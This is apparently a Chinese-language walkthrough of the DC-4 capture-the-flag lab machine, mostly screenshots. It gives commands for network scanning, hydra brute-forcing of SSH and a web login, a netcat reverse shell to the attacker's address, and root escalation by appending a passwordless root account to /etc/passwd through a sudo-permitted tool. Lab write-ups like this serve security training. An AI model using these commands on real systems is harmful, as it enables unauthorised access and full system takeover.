仅供个人娱乐
靶机信息
下载地址:http://www.five86.com/downloads/DC-4.zip
一、主机扫描
arp-scan -l
nmap -p 1-65535 -A -sV 192.168.17.130
![](https://upload-images.jianshu.io/upload_images/4664072-a30ebe91780badaa.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
二、信息收集
dirb http://192.168.17.130
![](https://upload-images.jianshu.io/upload_images/4664072-b7db9507bdb561df.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
![](https://upload-images.jianshu.io/upload_images/4664072-d996a916d57f98f4.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
![](https://upload-images.jianshu.io/upload_images/4664072-7398a857e1f85232.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
![](https://upload-images.jianshu.io/upload_images/4664072-3ff0048eb36ede77.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
![](https://upload-images.jianshu.io/upload_images/4664072-c5e43f2d896adb47.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
三、漏洞查找和利用
爆破ssh
hydra -L /root/user.txt -P /root/rockyou.txt -t 5 ssh://192.168.17.130
![](https://upload-images.jianshu.io/upload_images/4664072-0e238c4d8bad854c.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
字典设置太大了。
web页面
![](https://upload-images.jianshu.io/upload_images/4664072-54f01da78387bff8.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
爆破
![](https://upload-images.jianshu.io/upload_images/4664072-9e67f793b541a9c6.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
![](https://upload-images.jianshu.io/upload_images/4664072-e46cf9e6f97ef81e.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
或者使用hydra 爆破密码
hydra -l admin -P /usr/share/wordlists/rockyou.txt 192.168.17.130 http-post-form "/login.php:username=^USER^ password=^PASS^:S=logout" -F
登录成功
![](https://upload-images.jianshu.io/upload_images/4664072-0f5d6bddac9ed429.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
信息收集
![](https://upload-images.jianshu.io/upload_images/4664072-7c7f98dbd128bdb9.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
抓包
![](https://upload-images.jianshu.io/upload_images/4664072-96ecf85a1aef7eb8.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
![](https://upload-images.jianshu.io/upload_images/4664072-70db14520e78c614.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
![](https://upload-images.jianshu.io/upload_images/4664072-5f59bcec89580e00.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
![](https://upload-images.jianshu.io/upload_images/4664072-49a229556bfc9ebf.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
可以反弹shell命令:
nc -e /bin/bash 192.168.17.129 4444
![](https://upload-images.jianshu.io/upload_images/4664072-58f1cf9d9911aece.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
![](https://upload-images.jianshu.io/upload_images/4664072-55269b128570b38f.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
python -c 'import pty;pty.spawn("/bin/bash")'
![](https://upload-images.jianshu.io/upload_images/4664072-ef52525998dfb0a8.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
信息收集
![](https://upload-images.jianshu.io/upload_images/4664072-c28706cbe2f4f184.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
![](https://upload-images.jianshu.io/upload_images/4664072-cf9141ec1b85a142.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
复制 作为字典
![](https://upload-images.jianshu.io/upload_images/4664072-85d676b017808561.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
ssh登录
![](https://upload-images.jianshu.io/upload_images/4664072-267b89fccf79c396.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
查看信息
![](https://upload-images.jianshu.io/upload_images/4664072-b4f90dcba9095111.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
![](https://upload-images.jianshu.io/upload_images/4664072-fbdcdc5d0c4adbec.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
切换账户登录[charles:^xHhA&hvim0y]
![](https://upload-images.jianshu.io/upload_images/4664072-2d0e4c60ebdb6826.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
查看用户权限发现,该用户可以以root权限免密码执行 /usr/bin/teehee
![](https://upload-images.jianshu.io/upload_images/4664072-f3e8c414e6f5fef3.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
信息收集
![](https://upload-images.jianshu.io/upload_images/4664072-bd1b38444326d753.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
第一种获取权限方法
添加账户
echo test::0:0:::/bin/bash | sudo teehee -a /etc/passwd
tail -n 5 /etc/passwd
su test
![](https://upload-images.jianshu.io/upload_images/4664072-a90ad5abacdedb96.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
![](https://upload-images.jianshu.io/upload_images/4664072-b9197438407fceb4.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)